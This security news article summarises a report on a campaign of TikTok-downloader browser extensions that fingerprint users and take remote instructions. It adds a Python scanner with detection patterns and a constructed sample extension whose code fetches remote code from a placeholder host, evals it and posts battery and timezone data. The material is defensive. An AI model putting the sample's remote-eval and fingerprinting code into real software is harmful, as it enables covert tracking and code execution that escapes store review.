A new report from LayerX security researchers has pulled back the curtain on a massive, coordinated campaign involving at least 12 interrelated browser extensions. While these tools promise to help users save their favorite TikTok content, they are secretly part of a “long-standing and persistent campaign” designed to track user activity and harvest data.
To date, the operation has successfully compromised over 130,000 users across the Google Chrome and Microsoft Edge marketplaces.
The campaign’s success lies in its use of a single code family to create a “resilient ecosystem”. Instead of building unique tools, the threat actor spins off multiple versions—some are nearly identical clones, while others are lightly rebranded under names like “TikTok Video Downloader,” “Mass Tik Tok Downloader,” and “No Watermark Saver”.
This strategy creates a continuous cycle that LayerX researchers describe as an operational model rather than just a malware campaign:
- Gain Trust: Extensions often operate legitimately for 6-12 months before introducing malicious features.
- Official Endorsement: Many of these extensions managed to earn a “Featured” badge in official stores. As the report notes, “this designation is typically associated with vetted, high-quality extensions… it significantly lowers user suspicion and increases installation likelihood”.
- Rapid Redeployment: When one extension is finally flagged and removed, the attackers simply upload new clones with the same descriptions and functionality.
The most dangerous technical aspect of these extensions is their reliance on dynamic remote configuration. Rather than hardcoding malicious behavior, the extensions fetch instructions from attacker-controlled servers.
This mechanism allows the attackers to “modify their behavior and functionality after installation, without users or marketplaces being aware”. By altering behavior instantly, the extensions can bypass store review processes, enabling data flows that remain invisible to security auditors.
Beyond tracking browsing habits, these extensions collect a startling amount of telemetry to create a unique “fingerprint” for every user. Collected data includes:
- Usage patterns and interacted content.
- Device characteristics like language, timezone, and user agent.
- Battery status, which researchers call “an unusual but valuable signal for device fingerprinting”.
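As an added illustration (this is not code from the LayerX report or from any of the extensions it names), the following Python heuristic scanner checks an unpacked extension's files for the two behaviours described above: remote configuration fetched and executed after installation, and fingerprinting signals such as language, timezone, user agent and battery status. The indicator patterns, the scoring weights and the sample extension files are assumptions constructed for the example.

```python
import json
import re

# Heuristic indicators drawn from the behaviours described in the report (assumed
# patterns, not signatures from the actual extensions): remote config, dynamic code, fingerprinting.
INDICATORS = {
    "remote_fetch": re.compile(r"\bfetch\(\s*['\"]https?://"),
    "dynamic_code": re.compile(r"\b(eval|new\s+Function)\s*\("),
    "battery_api": re.compile(r"navigator\.getBattery\s*\("),
    "timezone": re.compile(r"Intl\.DateTimeFormat\(\)\.resolvedOptions\(\)\.timeZone"),
    "user_agent": re.compile(r"navigator\.userAgent\b"),
    "language": re.compile(r"navigator\.language\b"),
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

def audit_extension(files):
    """files: mapping of path -> text for an unpacked extension.
    Returns a dict of indicator -> list of files in which it was seen."""
    findings = {}
    manifest = json.loads(files.get("manifest.json", "{}"))
    hosts = set(manifest.get("host_permissions", [])) | set(manifest.get("permissions", []))
    if hosts & BROAD_HOSTS:
        findings["broad_host_permissions"] = ["manifest.json"]
    for path, text in files.items():
        if not path.endswith(".js"):
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                findings.setdefault(name, []).append(path)
    return findings

def risk_score(findings):
    """Weight the combination that matters most: remote config plus dynamic code (assumed weights)."""
    score = 0
    if "remote_fetch" in findings and "dynamic_code" in findings:
        score += 5  # behaviour can be changed after store review
    score += sum(1 for k in ("battery_api", "timezone", "user_agent", "language") if k in findings)
    if "broad_host_permissions" in findings:
        score += 2
    return score

# Constructed sample mimicking the described behaviour; not real extension code.
SAMPLE = {
    "manifest.json": json.dumps({"manifest_version": 3, "host_permissions": ["<all_urls>"]}),
    "background.js": (
        "fetch('https://config.example.invalid/cfg').then(r => r.text()).then(c => eval(c));\n"
        "navigator.getBattery().then(b => post({lvl: b.level, tz: Intl.DateTimeFormat().resolvedOptions().timeZone}));\n"
    ),
}
```

Run `audit_extension` over the files of an unpacked extension directory and treat a high `risk_score` as a prompt for manual review, since these patterns also appear in some legitimate extensions.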
LayerX researchers warn that this campaign represents a broader shift in how browser extensions are exploited. The true risk is not just what the extensions are doing now, but their potential for “broader data exfiltration, abuse of authenticated requests, or integration into larger proxy or botnet-like infrastructures” in the future.
The report concludes with a reminder: “The real risk lies not in what the extensions do today, but in what they are capable of doing tomorrow”.